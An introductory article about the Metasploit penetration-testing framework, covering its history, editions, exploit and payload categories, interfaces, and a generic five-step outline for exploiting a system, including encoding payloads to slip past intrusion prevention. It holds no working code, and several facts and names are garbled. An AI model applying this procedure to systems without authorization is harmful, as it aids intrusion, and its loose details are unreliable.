What is Metaspoilt?
The Metasploit Project is a computer security project that shows the vulnerabilities and aids in Penetration Testing. Penetration Testing is an authorized simulated attack on computer system looking for security weaknesses, and Instruction Detection System (IDS) signature, which on the other hand monitors a network or systems for malicious activities. The other most related sub-project is the Metasploit Framework. Metasploit Framework is open source and it is the most common exploit development framework in the world. I will elaborate on this framework idea later on in this article.
However, one can utilize it to perform some legitimate and unauthorized accesses and activities on computer systems. In this regard, it is no different from any other similar commercial products such as Immunity’s Canvas or Core Security Technologies. However, Metasploit is commonly used to break into remote systems or test for a computer system vulnerability.
Since it’s development in the high-level language of Perl by Moore in 2003, there were two main alternates that occurred to Metasploit along with its framework. First, by 2007 the framework got entire redevelopment using Ruby programming language. Later, in 2009 Rapid7 adopted the project. Rapid7 is a security company which provides unified vulnerability management solutions.
Two of the main contributions of Rapid7 was the execution of Metasploit Express and Metasploit Pro. Metasploit Express, whose release was in 2010, functionally targets security teams who verify vulnerabilities. While it provides the user with an automated evidence collection, it allows them to use brute-force methods as well. Further, Metasploit Express integrates the Network Mapper (Nmap) and offers a user-friendly graphical user interface (GUI).
Additional features that distinguished Metasploit Pro came in 2010. The main focus of this edition was penetration testers and IT security teams. Quick Start Wizards/MetaModules, building and managing social engineering campaigns, an advanced Pro Console, web application testing, dynamic payloads for anti-virus evasion, integration with Nexpose for ad-hoc vulnerability scans, and Virtual Private Network (VPN) pivoting were all of the features characterizing Metasploit Pro.
Metasploit 4.0 was released in 2011 while its preceding version was Metasploit 3.0 released in 2006, having its following updates afterward. Fuzzing tools, such as providing random and unexpected inputs to a computer program for the sake of monitoring exceptions and crashes, were implemented to the old versions of the project in order to allow finding and discovering software vulnerabilities, not merely exploiting known bugs.Accordingly, a third party Metasploit Module emerged in a way that scans for potential exploits of a software to provide reliable exploitability risk results and further recommends remediation to such bugs.
Fundamentally, an exploit is referred to as a piece of software, a chunk of data, or a sequence of commands that utilizes a bug or vulnerability in order to cause the unintended or unanticipated behavior to occur on a computer system or software. Exploits identified by Metasploit have numbered around 1613 exploits. Such exploits exist in four main categories.
The first category is Android and Apple iOs which targets mobile phones. In the meanwhile, Firefox is another category for remote code execution for this browser. Another category targets certain operating systems such as Windows, Linux, Unix, Mac, Sun Solaris… etc. The remaining category is multi. Exploits not related to any specific platform belong here.
When it comes to computer networking and the internet, a payload describes the notion of having the eventual effect of a software virus being delivered to a user’s computer. Metaspoilt owns over 438 payloads. Some rampant ones of these payloads are Command Shell which grants users the privilege of running collection scripts and commands against the host.
Meterpreter is another payload. This allows Virtual Network Computing (VNC) for users and allows browsing upload and download files as well. Dynamic payloads are another type of payloads which generate some unique payloads to avoid anti-virus defenses.
It is basically an open-source framework which accepts contributions by developers through GitHub.com website. Such contributions are mainly exploits and scanners. They are thereby reviewed by a team that has employees of Rapid7 and senior external contributors. The main developers of the framework are Moore, Mart Miller, and spoon.
Other than Metasploit Express and Metasploit Pro, there are four other main available interfaces for Metasploit: Metasploit Framework Edition is the free version of Metasploit. It offers a command line interface, Zenmap, a compiler for Ruby, and a well-known ports-scanner. Metasploit Community Edition is another free version. This version is included in the main installer, and it offers several features such as manual exploitation, network discovery and module browsing.
Armitage is another free interface for it, which is a graphical cyber attack management tool harnessed to visualize targets and recommend exploits based on the vulnerabilities. It is open source network security tool which allows for shared sessions, data, and communication through a single instance. Cobalt Strike is another interface in which it contains all the features of Armitage, adding post exploitation tool and report generation features. Nonetheless, this interface is provided by another company called Strategic Cyber LLC.
How to exploit a system using Metasploit:
One of the main advantages of its Framework is that it allows the accompaniment of any exploit type with any other payload type. First, must get some information about the intended target system before going through the detailed steps of exploiting a system.
How can we know the installed network services and operating system versions for instance? For this sake, we can intentionally use port scanning, to know open ports by a host in a network, and OS fingerprinting, by analyzing the data flowing from such systems, tools like Nmap, and Vulnerability Scanners such as Nexpose, Nessus, and OpenVAS. To ensure an accurate exploiting method, the Metasploit imports such vulnerability scanners data and assure that the proposed exploit is appropriate for any existing vulnerabilities.
There are five basic steps in exploiting a system using Metasploit:
- Choose a certain exploit and configure it by writing the appropriate code to target a system. Then, exploit a certain bug in it.
- Check whether the target system is susceptible to the given exploit.
- Choose a certain payload to apply on the target system when managing to exploit it and get through it.
- Choose the appropriate encoding technique in order to deceive the intrusion-prevention system (IPS) and make it ignore the oncoming payload.
- Finally, execute the Exploit.
Some Commands used:
It searches for a match for a given pattern. For example: “search xxx” will search all occurrences of “xxx”
It tells the program to use a particular exploit
It sets the value for a given parameter
It sets the value for a given parameter globally, to avoid resetting the parameters again and again later on.
Finally. this performs the attack on the target system.